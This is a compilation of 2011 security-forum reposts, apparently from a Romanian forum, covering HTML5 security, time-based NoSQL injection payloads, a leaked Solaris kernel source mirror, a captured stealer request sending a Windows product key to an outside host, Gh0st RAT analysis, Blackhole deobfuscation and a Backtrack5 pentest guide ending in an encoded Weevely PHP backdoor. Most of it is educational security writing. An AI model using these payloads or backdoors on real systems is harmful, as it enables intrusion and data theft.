Nytro

HTML5 web security December 6th, 2011 Document Name: HTML5_Web_Security_v1.0.docx Version: v1.0 Author: Michael Schmidt, Compass Security AG Reviewer: Thomas Röthlisberger, Compass Security AG Date of Delivery: December 6th, 2011 Classification: Article Overview to HTML5 web security by Michael Schmidt [michael.schmidt-@-csnc.ch], reviewed by Thomas Röthlisberger [thomas.roethlisberger-@-csnc.ch] This article is an extract of the master thesis written by Michael Schmidt. The security relevant aspects of HTML5 that were considered in this thesis are covered in the subsequent document. It needs to be considered that the content of this document was released in May 2011. Compass Security makes regular updates to its HTML5 security know how and provides additional information. Please visit Compass Security AG - Switzerland or contact us for the most current version. Download: http://media.hacking-lab.com/hlnews/HTML5_Web_Security_v1.0.pdf

Time-Based Blind NoSQL Injection Authored by Felipe Aragon | Site syhunt.com Posted Dec 19, 2011 This is a brief write up discussing time-based NoSQL injection attacks using javascript. Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities In July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-side JavaScript injection vulnerabilities in web applications using MongoDB and other NoSQL database engines. He demonstrated how they could be used to perform Denial of Service, File System, Remote Command Execution, and many other attacks, including the easy extraction of the entire contents of the NoSQL database -- a blind NoSQL injection attack (paper here at https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf). We not only confirmed the published data about the NoSQL injection vulnerabilities, but also discovered that the MongoDB shell supports a sleep() function which makes time-based detection possible of vulnerable web applications. It is also possible to inject a custom sleep code, a technique that may be used to spot injection vulnerabilities in web applications using server-side JavaScript execution. This is not restricted to MongoDB. Below you can find two examples of NoSQL injection vulnerabilities in PHP that could be spotted using these techniques. Example 1: NoSQL Injection Vulnerability in PHP The following requests would make these (or similar) vulnerable web application sleep for 10 seconds: vulnerable.php?msg=1';sleep(10000);var%20foo='bar The MongoDB sleep() function works with milliseconds. Alternative technique using a custom sleep code: vulnerable.php?msg=1';var%20d%20=%20new%20Date();%20var%20cd%20=%20null;%20do%20{%20cd%20=%20new%20Date();%20}%20while(cd-d%20<%2010000);var%20foo='bar <? $mongo = new Mongo(); $db = $mongo->demo; $id = $_GET['id']; $js = "function() { var id = '$id'; SOME CODE... }"; $response = $db->execute($js); ... ?> Example 2: NoSQL Injection Vulnerability in PHP <? $mongo = new Mongo(); $db = $mongo->demo; $year = $_GET['year']; $collection = $db->demo; $query = 'function() {var search_year = \'' . $year . '\';' . 'return this.publicationYear == search_year || ' . ' this.filmingYear == search_year || ' . ' this.recordingYear == search_year;}'; $cursor = $collection->find(array('$where' => $query)); ... ?> Example 3: Sleep in JavaScript var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < 10000); // delay time (ms) Solution Always validate user input used in server-side JavaScript commands. Article by Felipe Aragon. Originally published at http://www.syhunt.com/?n=Articles.NoSQLInjection --- Copyright © 2010 Syhunt Security Disclaimer: The information in this article is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes. Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this article. Sursa: Time-Based Blind NoSQL Injection ? Packet Storm

[h=1]Oracle Solaris 11 Kernel Source Leaked[/h]December 19th, 2011, 14:00 GMT · By Marius Nestor As Phoronix announced a couple of minutes ago, it appears that a snapshot of the kernel source code for Oracle's Solaris 11 operating system has been leaked on major torrent and file hosting sites. Searching "solaris11.tar.bz2" on Google, Softpedia can also confirm that the bzip2 archive of about 104 MB contains the source code of Oracle Solaris 11's kernel. Being a closed source operating system, Oracle is probably trying right now to delete the leaked Solaris 11 kernel archive from aforementioned sites. The Oracle Corporation announced the Oracle Solaris 11 cloud operating system on November 9th, supporting the security, scalability and performance requirements of cloud-based deployments. Oracle Solaris 11 brings features like the ZFS filesystem, virtualization capabilities, comprehensive management, "secure by default" features, cloud-scale life cycle management, SPARC and x86 certified. Download Oracle Solaris 11 right now from Softpedia. Mirror: Download solaris11.tar.bz2 for free on uploading.com Sursa: Oracle Solaris 11 Kernel Source Leaked - Softpedia

[h=1]Analyzing malware using Sysinternals’ VMMap[/h]Posted by Chief Banana on December 19, 2011 In May 2011, Sysinternals released a new tool called ‘vmmap’. According to the website: ‘VMMap is a process virtual and physical memory analysis utility. It shows a breakdown of a process’s committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Besides graphical representations of memory usage, VMMap also shows summary information and a detailed process memory map’. While analyzing a piece of malware for a chapter in a book, I discovered the great usage of this tool. I already identified that a suspicious connection was using the PID of 1040. Investigating the processes around this PID, it became clear that this PID belonged to one of the ‘svchost’ processes. Another interesting file that was used by this process was called ’6to4ex.dll’ Opening VMMap from a forencic cd-rom, the tools asked for the starting process. In this case I selected the option ‘ SVCHOST’ with the PID of 1040. Next the breakdown of this process committed virtual memory types and used files are visible. Under the svchost process overview, the ’6to4ex.dll’ file was also shown. Selecting this file and using the shortcut ‘CTRL+T’, which activates the strings view command, very interesting strings about this file became visible: The interesting strings about the malware used and capabilities: · ‘%s\shell\open\command · Gh0st Update · E:\gh0st\server\sys\i368\RESSDT.pdb · \??\RESSDTDOS · ?AVCScreenmanager · ?AVCScreenSpy · ?AVCKeyboardmanager · ?AVCShellmanager · ?AVCAudio · ?AVCAudiomanager · SetWindowsHookExA · CVideocap · Global\Gh0st %d · \cmd.exe By searching for more details around the term ‘Gh0st’ and backdoor it became clear that this might be a Chinese Remote Access Tool (RAT) that is common known to be used in targeted attacks. Features of this RAT are: capturing audio/video/keystrokes, remote shell, remote command, file-manager, spying the screen and many more. Definately VMMap will be part of my malware IR-kit Sursa: Analyzing malware using Sysinternals’ VMMap | securitybananas.com

NoScript detection with CSS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Test</title> </head> <iframe src="detection.html" width="180" id="testframe"></iframe> <script type="text/javascript"> document.getElementById("testframe").style.width = "400px"; </script> </html> detection.html: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>detection</title> <style type="text/css"> .active { display:none; } .notactive { display:block; } @media screen and (max-width: 200px) { .active { display:block; } .notactive { display:none; } } </style> </head> <body> <div class="active">Noscript is active</div> <div class="notactive">Noscript is not active</div> </body> </html> Sursa: Test Tricky...

GET /steler/index.php?action=add&a=4&c=JOHN-66E06C37B1&u=-&l=Microsoft Windows XP Professional&p=VGBRV-X2DDM-JYDFW-22MQW-3G39Y HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.cruciatii.in Connection: Keep-Alive @alexbest Ban permanent. Daca doriti sa discutati cu el: cs.alexbest @ IM E din Stefanesti, probabil e de la tara, deci na... Deci programul e de fapt Stealer de Firefox si probabil si altele.

[h=1]Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages[/h]By Lucian Constantin Dec 19, 2011 3:50 pm Attackers can force mobile phones to send premium-rate SMS messages or prevent them from receiving messages for long periods of time by leveraging a logic flaw in mobile telecommunication standards. The flaw was discovered by independent security researcher Bogdan Alecu, who demonstrated how it can be exploited at the DefCamp security conference in Romania on Saturday. Alecu exploited the way mobile devices process text messages intended for special applications called SIM Toolkits, which he said are preloaded on SIM cards by over 90 percent of mobile operators. The applications can perform actions that include checking credit or voice mail, calling emergency numbers or customer support, and even performing mobile banking, and typically appear on the phones as a menu or application bearing the operator's name. SIM Toolkits can receive commands through specially-formatted SMS messages, but in order for these commands to be executed successfully, the message headers must contain a valid digital signature. The vast majority of mobile phones don't display any notification when they receive SIM Toolkit messages, he said. Some wake from their sleep state, but no message is visible in the inbox and there's no other indication that a message was received. The encryption used to verify message authenticity is pretty solid and can't be cracked, Alecu said. Instead, his attacks rely on phones automatically returning error messages rather than executing legitimate commands. [h=2]Automatic Replies by Default[/h] Error replies are sent automatically. Users of some phones might see a message is being sent, but they can't usually stop it. Alecu tested his exploits on phones from various manufacturers. Only devices from Nokia have an option to ask phone owners to confirm sending a SIM Toolkit response. The option, "Confirm SIM Service Actions," is usually off by default, especially on phones configured by operators. He tested phones from High Tech Computer (HTC) and Samsung Electronics running stock Android firmware, and an LG Optimus One with CyanogenMod, a community-built version of the popular mobile operating system. None of them displayed a notification when sending SIM Toolkit responses, and he found no option to block responses. BlackBerry devices presented a similar behavior, he said. Windows Mobile 6.x devices and iPhones notified users a message was being sent, but offered no way to stop it. Alecu hadn't yet tested a Windows Phone 7 device. The sender of a SIM Toolkit service message can request that the phone reply via SMS either directly to the sender's number, or to the operator's message center, according to Alecu. [h=2]How Scammers Attack[/h] Those two options give rise to two different attack scenarios, he said. For the reply-to-sender option (SMS-SUBMIT), an attacker could force the sending of the error message to a premium-rate number using an SMS spoofing service. SMS spoofing is the practice of changing the originating number of a text message to anything the sender desires. This can have legitimate as well as malicious purposes, and there are many online services that provide the feature for a small fee. Some mobile operators have strict rules on setting up premium-rate numbers. Applicants might be asked to prove that they are a registered business and provide information about how the number will be used. Restrictions can also be placed on the text strings that a message must contain in order for the sender to be charged, which would limit this attack because the attacker can't control the content of the automatic response. However, the number and diversity of existing SMS scams is proof that obtaining a premium-rate number is not that difficult. If the second option (SMS-DELIVER-REPORT) is used, the error is sent to the operator's message center where it is interpreted as a message delivery failure. When messages can't be delivered, because a phone is turned off or outside the service area, operators usually attempt to resend the undelivered message every few minutes for a predefined period of time. When this happens, all subsequent messages intended for that number are placed in a queue to be delivered when the phone re-joins the network. Because receiving a bogus SIM Tookit message will always result in an error response, a loop is created between the message center and the phone, preventing the subscriber from receiving legitimate messages. This denial-of-service (DoS) condition is not permanent and after a while, typically 24 hours, the undelivered message is automatically discarded. However, if an attacker were to send seven bogus SIM Toolkit messages one after the other, the message center would attempt to deliver each of them for 24 hours, resulting in a week of SMS DoS. [h=2]Flaw Revealed[/h] Alecu demonstrated the attacks on SIM cards from multiple operators in Romania, Bulgaria, Austria, Germany and France. However, since the attacks exploit a logic flaw in the GSM standard and later mobile standards, he believes that the majority of operators that use SIM Toolkits are affected. Mitigating the attack is possible at both operator and device level. Operators can filter SIM Toolkit messages and restrict which numbers are allowed to send them. This would be an elegant solution, but Alecu has yet to find an operator that implemented it. Phone manufacturers could enforce confirmation for SIM actions from their software. However, this fix will probably not be as effective as message filtering at operator level, Alecu said. Firmware updates are not always easy to install, especially on older phones. Performing a firmware upgrade in the wrong way can render devices unusable and many affected phones might not even be supported anymore. The U.S. Computer Emergency Readiness Team (US-CERT) was notified of the problem in August 2010, and was asked to coordinate the disclosure process, Alecu said. He said Research In Motion (RIM) has contacted him and is working on a fix. "We are aware of the claims and are investigating them," Nokia spokesman Tomi Kuuppelomäki said. Samsung, HTC, RIM and Apple did not return a request for comment. Sursa: Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages | PCWorld Business Center

Aici nu exista fete sau baieti, exista membri, indiferent de sex. Motivul e simplu: se fac discriminari sexuale, etnice sau de orice alt fel. Dar credem in libertatea de exprimare, deci sunt permise.

"If it is not free, it is a product. If it is free, maybe you are the product."

Microsoft si-a lansat retea sociala (Video) Autor: Emilian Nedelcu Luni, 19 Decembrie 2011, ora 08:24 Compania Microsoft a lansat de curand o retea sociala, numita So.cl (se citeste "social"), care deocamdata este disponibila unui numar strans de persoane. Reprezentantii companiei au declarat de So.cl va fi o retea sociala destinata studentilor, pentru a-i ajuta sa-si impartaseasca informatii in mod rapid, sa construiasca pagini sau sa obtina rapid informatii, pentru a transforma Internetul si retelele sociale existente intr-o mare sala de clasa. Similar, Facebook, cea mai mare retea sociala din lume, cu peste 800 de milioane de utilizatori, a fost destinata, initial, doar unui numar restrans de studenti. So.cl este un proiect de cercetare experimental, potrivit oficialilor Microsoft, care este disponibil studentilor din facultatile de informatica si de design din Washington University, Syracuse University si New York University. In timp, vor fi adaugate si alte universitati. So.cl a fost proiectat pentru studenti pentru a le extinde experienta educationala si pentru a-i ajuta sa regandeasca modul in care pot invata si comunica. Utilizatorii retelei pot scrie articole, care sa fie inconjurate de elemente precum fotografii, video sau text. Utilizatorii pot identifica alti utilizatori cu interese similare, iar reteaua permite construirea de comunitati in jurul unui anumit scop (educational). Pana in acest punct, reteaua So.cl nu spune nicio noutate, toate aceste functionalitati fiind prezente, spre exemplu, si in Facebook. Utilizatorii So.Cl pot urmari alte persoane, sau pot seta feed-uri. De asemenea, utilizatorii pot urmari doar anumiti oameni sau pot vedea ce scriu toti prietenii inregistrati. Sursa: Microsoft si-a lansat retea sociala (Video)

Nu, asta e Gecko al nostru: Gecko (layout engine) - Wikipedia, the free encyclopedia

A, facut de tine, felicitari. Dar parca arata mai bine prima versiune.

Glume cu "bucatarie", sigur e fata. Bine ai venit.

Reverse Engineering Mac OS X Mac OS X - 2005 and before Mach-O Infection.ppt (presentation) Breaking Mac OS X.ppt (presentation) Hacking Mac OS X Kernel for unsupported machines.pdf (paper) MacOS Kernel Insecurity.pdf (presentation) Overriding Mac OS X.pdf (paper) A Debugger with Gui in OS X.pdf (paper) - 2006 Abusing Mach on Mac OS X.pdf (paper) - 2007 Hacking Leopard.pdf (paper) Inside the Mac_OS X_kernel.pdf (paper) - 2008 BlackHat-Japan-08-Miller-Hacking-OSX.pdf (presentation) BH-US-08-Dtrace The Reverse Engineer’s Unexpected Swiss Army Knife (presentation) iRK – Crafting OS X Kernel Rootkits (presentation) RETrace – Applied Reverse Engineering on OS X – defcon-16.pdf (presentation) Under the iHood – REcon 2008.pdf (presentation) Covering-tracks-Mac-OS-leopard_5991.pdf (paper) OSX_Rootkits – the next level.pdf (presentation) - 2009 Advanced Mac OSX Rootkits.pdf (paper) Defcon-17-bosse_eriksson-kernel_patching_on_osx.pdf (presentation) D1T1 – Dino Dai Zovi – Mac OS Xploitation.pdf (presentation) Advanced-Mac-OS-X-rootkits.pdf (presentation) Dynamic Tracing for Exploitation and Fuzzing-final.pdf (presentation) Mac-os-malware-analysis_33178.pdf (paper) Objective-c-internals.pdf (presentation) Hacking Macs for Fun and Profit – csw09-daizovi-miller.pdf (presentation) Macos xploitation-source2009.pdf (presentation) Debugging Cocoa with DTrace.pdf (paper) BlackHat-DC-09-Iozzo-Macho-on-the-fly.pdf (presentation) Dynamically Overriding Mac OS X – Down the Rabbit Hole.pdf (presentation) Encryption Wrapper on OSX.pdf (presentation) - 2010 Function-hooking-for-OSX-and-Linux.pdf (presentation) Mac Os X Hacking SnowLeopard.ppt (presentation) BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-slides.pdf (presentation) BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf (paper) Post exploitation techniques on OSX and Iphone – eusecwest.pdf (presentation) Programacion de rootkits en Mac OS X.pdf (paper, in Spanish) - 2011 Defiling-Mac-OS-X-Kernel-Rootkits-Ruxcon.pdf (presentation) Hacking at mach2.pdf (presentation) The Apple Sandbox – BHDC2011-Paper.pdf (paper) The Apple Sandbox – BHDC2011-Slides.pdf (presentation) Battery Firmware Hacking.pdf (paper) iSEC_BH2011 – Macs in the Age of APT.pdf (presentation) iOS - 2009 BlackHat-Europe-2009-Miller-Iozzo-OSX-IPhone-Payloads-whitepaper.pdf (paper) - 2010 iPhone Rootkit Toorcon 2010.pdf (presentation) D2T1 – Cedric Halbronn and Jean Sigwald – iPhone Security Model.pdf (presentation) - 2011 D1T2 – Laurent Oudot – Extracting Senstive Data from Your iPhone.pdf (presentation) D2T2 – Jean-Baptiste Be?drune & Jean Sigwald – iPhone Data Protection in Depth.pdf (presentation) Auditing iPhone and iPad applications – van Sprundel.ppt (presentation) Practical Consideration of iOS Device Encryption Security.pdf (paper) Apple iOS 4 Security Evaluation.pdf (presentation) BH_US_11_DaiZovi_iOS_Security_WP.pdf (paper) BH_US_11_Belenko_iOS_Forensics_Slides.pdf (presentation) BH_US_11_Belenko_iOS_Forensics_WP.pdf (paper) BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides.pdf (presentation) BH_US_11_Esser_Exploiting_The_iOS_Kernel_WP.pdf (paper) D2T1 – Stefan Esser – iPhone Exploitation – One ROPe to Bind Them All.pdf (presentation) D2 SIGINT – Keith Lee – iPhone Espionage.pdf (presentation) D1T1 – Stefan Esser – Antid0te 2.0 – ASLR in iOS.pdf (presentation) SysScan-Singapore-Targeting_The_IOS_Kernel.pdf (presentation) Sursa: Papers | Reverse Engineering Mac OS X

[h=3]SEH Hooking[/h][h=2]Saturday, December 17, 2011[/h] In this example, I will cover a method of hooking which uses SEH (Structured Exception Handling) in order to hook code in any location without overwriting the code. This method of hooking is very much alike the SEH Hooking which is used by many debuggers to place breakpoints, but has two small differences. Instead of writing INT3 Breakpoints and catching the BREAKPOINT Exception, I'm setting the memory to PAGE_NOACCESS and catching the ACCESS_VIOLATION Exception. Instead of writing the address of my handler to the PEB directly, I'm using a VEH (Vectored Exception Handler), which is being added using the AddVectoredExceptionHandler() WinAPI Function. This method of hooking works by modifying the protection of a byte of memory at the location of our hook to PAGE_NOACCESS. When this memory is executed, our VEH catches an ACCESS_VIOLATION Exception. It then checks the instruction pointer to see if the violation occurred at the location of our hook. If this ACCESS_VIOLATION is not our hook, we return CONTINUE_SEARCH to allow other handlers to work with the exception. However, if it is our hook, we do 3 things: Execute our hook's callback Restore the memory access to its original state Set the trap flag, which will trigger a single step We then return CONTINUE_EXECUTION. This time, the hooked code executes it's first byte flawlessly and then triggers a SINGLE_STEP Exception. This single step is a result of setting the trap flag, and it allows us to set the hooked memory back to PAGE_NOACCESS so our hook will execute again the next time the hooked memory is accessed. Since our exception handler's ContextRecord contains a pointer to the top of the stack, we are also able to access function arguments and find return addresses. Because of this, we can block the execution of a function or change the input, just like in a normal hook. To block execution, we can place a JMP [ReturnAddressFromStack] in our hook handler. While this jumps right back into execution and skips steps 2 and 3 of our exception handling, it is jumping back to the calling function and not the hooked code. The NOACCESS remains in place for next time. While this rendition of SEH Hooking isn't flawless, it does illustrate the concept and get the job done. In most cases, if you plan on using SEH Hooking, I would recommend using INT3 Breakpoints, though. This method, however, is a good way to bypass modification detection. While programs may checksum their code, they don't usually verify the memory protection of every page in the program. In the example code, I hook the MessageBoxA() WinAPI Function. Inside my handler, I call printf() to print the caption and text to the console. I then block execution of MessageBoxA(). Sursa: Rev++: SEH Hooking

[h=3]Intro to javascript malware analysis[/h] Posted by Ax0n I am by no means an expert on this stuff. A few weeks ago, I ran across some suspicious links in spam and decided to see where they led. Some of them claimed to be from financial institutions that I have absolutely no connection to, and claimed that some transaction had failed to occur. Others were variants of shipping confirmation scams, pharmacy junk, etc. I wish I could say that I have no idea how people fall for these, but the fact is that some people will literally click on anything that shows up in their inbox, open any attachment and follow any link, no matter how blatantly fake we professionals think these scams are. What lay at the tail end of all the script="http://some-site/whatever.js" includes and document.location redirects? A webpage that'd been owned, filled with a huge pile of nonsensical jibberish that could barely pass as javascript, which happened to be part of the Blackhole Exploit Kit. I've done my share of picking apart obfuscated javascript before, but it had been a while. I gave a presentation of this same thing at KC2600 a few weeks ago. Then, this week, a colleague of mine who missed the meeting ran into the same thing in the wild. I passed on what I'd learned, and decided it might be time to write it up with a little more detail than I did a few weeks back. He made this quick video that covers how he was able to de-obfuscate this particular sample: By now, I've seen several different obfuscation schemes for BlackHole, but once it's decoded, it all looks about the same. The introductory basics are simple. Minimize the potential of infection by using a non-privileged account (and perhaps an OS other than Windows) and/or minimize the impact of a successful infection by running a virtual machine that you can blow away or revert to a snapshot of a known clean state. For the malware I'm using in this example, either (or both) of the above criteria will be ample to keep things from getting out of control. Other malware may be more insidious or may target non-Windows platforms. I have a few friends that have unwittingly infected their own workstations while trying to analyze things. Play safe. Once you have a safe lab environment, your goal is to examine a suspicious link and dissect it. In my case, I was able to find a few links to malware in my personal mail's spam folder. For the demo at KC2600, I used Malware Domain List to find some Blackhole samples. In the wild, there may be any number of redirects ahead of the malware. You may see a shortened URL (through goo.gl, tinyurl, etc) which goes to a sparse HTML page with several calls to javascripts hosted on various sites, and those javascripts may simply be a document.location pointing to the malware. I usually stick with curl or wget to pull down suspicious links, and then I keep looking at the content and following the redirects until I strike gold. The javascript itself is ugly once you get to it. Sometimes, the byte array is only a few (really long) lines. Other times, like this sample, each byte of the obfuscated data is on a new line, like this: You'll see a few interesting things. There's an "e=eval;" line near the bottom, and then "e©;" after that. It doesn't take a coding genius to realize that this is a way to call eval© without triggering some IDS signatures that look for "eval(". Many samples I saw weren't quite this obvious. In fact, the script in the video has the eval alias in a different part of the script. In fact, the script in the video varies in several ways. To turn this cryptic payload into something that resembles actual javascript, there's a post on SANS ISC from several years ago covering a few methods. I went with the so-called Tom Liston Method, essentially trying to wrangle the decoded stuff that was destined for the exec function into a document.write within a textarea box instead. Note: I ran into one sample of BlackHole that has a /textarea tag near the beginning, which would keep someone from using this trick to easily view the code with this trick, but I don't think it will exec the stuff behind it since it's been changed to a document.write. In the above example (and in the video), the content that is destined for exec is stored in variable "c", so you simply replace "e©;" with: document.write("<textarea cols="150" rows="100">" + c + "</textarea>"); But obviously, you need to use some brain power here to figure out what trickery they're using to call exec, and what the variable is that needs to be wrapped up in the above document.write command. You may also wish to mess with the rows and columns on the textarea. I know on my netbook, that textarea size is far too unweildy. On my desktop, it's almost perfect. Make sure the file is renamed as a .html, then load it up in your safe lab environment's browser, just in case something goes wrong. Voila. If you scroll through recent versions of BlackHole Exploit Kit, you'll see that it tries to load an embedded java applet and a PDF, both of which are designed to exploit recent vulnerabilities in JRE and Adobe Reader. Since I don't have Windows running in a VM environment (and I'm not keen on actually infecting any of my Windows boxes) I'm not entirely sure what gets loaded from there. I'm guessing the carberp trojan, given most of what I've read lately. If that's the case, a successful infection would likely block access to anti-malware sites, try to sabotage existing security software, and start gathering sensitive data such as card numbers and online banking credentials. Sursa: HiR Information Report: Intro to javascript malware analysis

[h=2]Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5[/h] December 16th, 2011|By: Hari Krishnan Web application analysis plays a major role while doing a vulnerability assessment/penetration test. Proper information about the web application (for example like type of plugins used; CMS type – whether it is joomla, wordpress, etc.) can help the pentester determine the right exploit to use, as well reduce the overall time spent in doing so. Backtrack 5 comes with a very good set of tools required for performing all necessary information gathering. Tools for performing web application analysis are: CMS Identification IDS/IPS Detection Open Source Analysis Web Crawlers Vulnerability Assessment and Exploitation Maintaining Access [h=2][/h] [h=2]CMS Identification:[/h] blindelephant cms-explorer whatweb [h=3]BlindElephant[/h] BlindElephant is a python based tool for fingerprinting the web applications. This tool basically attempts to discover the version used by comparing the static files at certain known locations against the hashes which are pre-computed for the versions of those files. The tool is fast, non-invasive, takes low bandwidth and is highly automated. Usage: root@root:/pentest/web/blindelephant/src/blindelephant#python BlindElephant.py [options] url appName We can use the appName as “guess” if we are not sure about the web application or plugin type used. [h=3]CMS-Explorer[/h] CMS-explorer is another web application fingerprinting tool (written in perl) which can be used to identify the type of cms used and hence, perform the attack according to the information. There are few advantages in this tool, such as checking for any vulnerability from OSVDB for the particular plugin or CMS detected, updating the list of WP, Drupal, verbosity, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT. Usage: root@root:/pentest/web/cms-explorer# python cms-explorer.pl -url target -type type [options] [h=3]WhatWeb[/h] WhatWeb is again used to identify the type of content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries and servers used. This tool has over 900 plugins for scanning purposes, supporting proxy (including TOR), can defined with ip ranges similar to NMAP, fuzzing matching, and so forth. Usage: root@root:/pentest/web/whatweb# ./whatweb target.com ./whatweb –l will list the plugin list. [h=2]IDS-IPS detection[/h] While performing a VA/PT on a domain, there is the chance that IDS-IPS is installed. This can sometime stop various types of attacks performed on the domain. A lot of WAFs are sold to companies as a valid mitigation technique for web application vulnerabilities. Luckily, WAF is easy to detect because most of these use signature-based detection methods. Thus, the attacker can try to encode the attacking parameters and try to bypass the WAFs. Backtrack comes with two handy tools for detecting the IDS-IPS and they are waffit ua-tester [h=3]Waffit:[/h] Waffit is a web application firewall detection tool. Detecting the firewall behind the domain is a very important step during the penetration testing process. WAF can sometimes introduce vulnerabilities if it’s not configured. Analyzing them is also a major concern while doing a VA/PT. WAFs are usually easy to detect and they can be bypassed by encoding the attack parameters . Usage: root@root:~$python wafw00f.py Target.com : Furniture, Baby, Electronics, Toys,...: Target [h=2][/h] [h=2]Open-Source Analyses:[/h] Open-source analyses are conducted using tools like ghdb, revhosts, xssed, maltego . The ghdb and xssed are linked to websites, while the other two are tools. GHDB: GHDB stands for Google Hacking Database. The exploit-db team maintains a database for google dorks which can come handy for pentesters gathering information. We can use the dorks for finding certain types of vulnerable servers or other information. For example, a google dork like “Microsoft-IIS/6.0? intitle:index.of” can be used to detect the server which is running Microsoft IIS 6.0. Another advantage of this is that it gives a little anonymity, as well as helping pen testers to attack or perform a VA with more precision. Xssed: Xssed.com is another website that contains a list of cross-vulnerable websites, submitted by various authors. Pentesters can search for their target in the xssed.com database or check for other information that can be helpful during the VA/PT. Revhosts: Revhosts is a project for Passive information Gathering. It’s written in Python and likewise helps pentesters to gather information (i.e., the host, VirtualHost, DNS entry, directories, mail address, subnet, etc.). This tool comes both in GUI and console. [h=2]Web Crawlers:[/h] The final category of web application analyses is the web crawler. The tool found in BT5 is called webshag, and it comes in both GUI and console based. Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication Webshag has options like port scan, gathering basic information, spider, fuzzing Downlink: S C R T :: Attack : Downloads : Webshag. [h=2]Vulnerability Assessment and exploitation:[/h] The vulnerability assessment stage is where we scan our target for any loopholes or bugs. Before doing a vulnerability assessment, gathering information about the target will be more helpful. The information gathering phase remains the key step before performing further attacks, simply because it makes the work easier. So, for example in the first stage: in using the CMS scanners like BlindElephant, we scanned and found the version of the application installed. Here it is: joomla. Now in the Vulnerability assessment stage, we used scanner like joomscan. Below is the image showing the vulnerability in a particular site. Usage: ./joomscan.pl –u Target.com : Furniture, Baby, Electronics, Toys,...: Target or IP address The joomscan scans all the plug-ins installed and gives details about the vulnerabilities. We can use this information for further attacks. SqlMap: SqlMap is another good tool in the vulnerability assessment category. This tool can test whether the target url is vulnerable or not. Below is the example, where the highlighted text tells us that the parameter “newId” is vulnerable. The usage is as follows: ./sqlmap.py –u target.com -f Fimap: fimap is a python- based tool which can be used to find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. More modules and functionalities are being added to this tool, making it even more powerful. Fimap also allows us to add our own payloads. Usage: fimap -u IANA — Example domains -U defines the target url To scan a list of url from a text file, the command would be fimap -m -l ‘/tmp/urlscan.txt’ -m is for mass scanning -l is for list Scan websites using google dorks .fimap.py -g -q ‘inurl:include.php’ -g for searching from google -q stands for the query which is to be searched in google. Fimap can exploit the vulnerable target and can also upload an interactive shell for more exploitation Xsser: Xsser is an automatic -framework- to detect, exploit and report XSS vulnerabilities. It comes with options for bypassing the filters and other mode of injection. Usage: ./XSSer.py -u "http://www.target.com" -g "Search.php?tfSearch="–referer"666.666.666.666?–user-agent"correctaudit" This tool gives information like attack url, browsers and the method of the attack. Once the vulnerable url is detected, we can open the url and check it to confirm. theHarvestor: theHarvester tool is used for gathering user names, their email accounts, hostnames/subdomains from public resources (like, for example, google, bing, etc.). This tool again helps the pentester during the initial stage of VA/PT. It can be found in the “Web open source assessment ” option under web vulnerability assessment. Usage: ./theHaervester.py –ld [target domain] –d [ data source] The domains and the emails related to the particular website are being extracted, which can help for further attacks or research about the target. Shodan: This is, again, another web-based assessment tool of particular usefulness for pentesters. It can be used to gather a range of intelligence about the target devices which are connected to the internet. We can, for example, search to see if any network devices like routers, Voip, Printers, cams etc. are in place. To search if any service is running in the domain, the syntax would be: Syntax: Hostname:target.com port:80,21,22 Or simply to find out the results about the hostname, then simply search for Syntax: Hostname:target.com W3af: W3af is auditing and web application attack tool. It’s basically divided into various modules like attack, audit, exploit, discovery, evasion, brute force, and mangle, all of which can be used accordingly. These modules in w3af comes with various sub modules like, for example, we can select sqli option in Audit module, assuming that we need to perform a particular type of auditing. The below diagram shows a brief flowchart of the target website and makes it’s more easy to understand. Once the scan is completed, the W3af framework shows detailed information about the vulnerabilities found in the target website which can be compromised accordingly for further exploitation. Once the vulnerability is found, we can configure the plugins in the “Exploit” tab and perform further attacks, which can help us to get a webshell in the target site. Another major advantage is W3af also comes with MSF for taking the attack to next level. The results can be exported to html format, also. [h=2]Maintaining Access:[/h] Once we have access to the target website, we need to maintain access for future use because we don’t want to be starting from square one again and again. In order to avoid this, we can upload the web shells or backdoors to the target website. And encoding your backdoor is also important, since it should not create noise once uploaded in the server. If it does, then the administrators can easily detect it and remove the backdoors. BT5 comes with few good options for uploading webshells. Weevely: Weevely is a stealthy PHP backdoor, designed to stay beneath the radar. It provides a telnet-like connection, using a dynamic probe of system like functions to bypass PHP security restrictions. Weevely seeks functions like system(), passthru(), popen(), exec(), proc_open(), shell_exec(), pcntl_exec(), perl->system(), python_eval()), using the functions enabled on a remote server. The below code is a sample code of the backdoor created by the weevely. eval(base64_decode(‘cGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVSRVInXSwk YSk7IGlmKHJlc2V0KCRhKT09J2luJyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPGZv 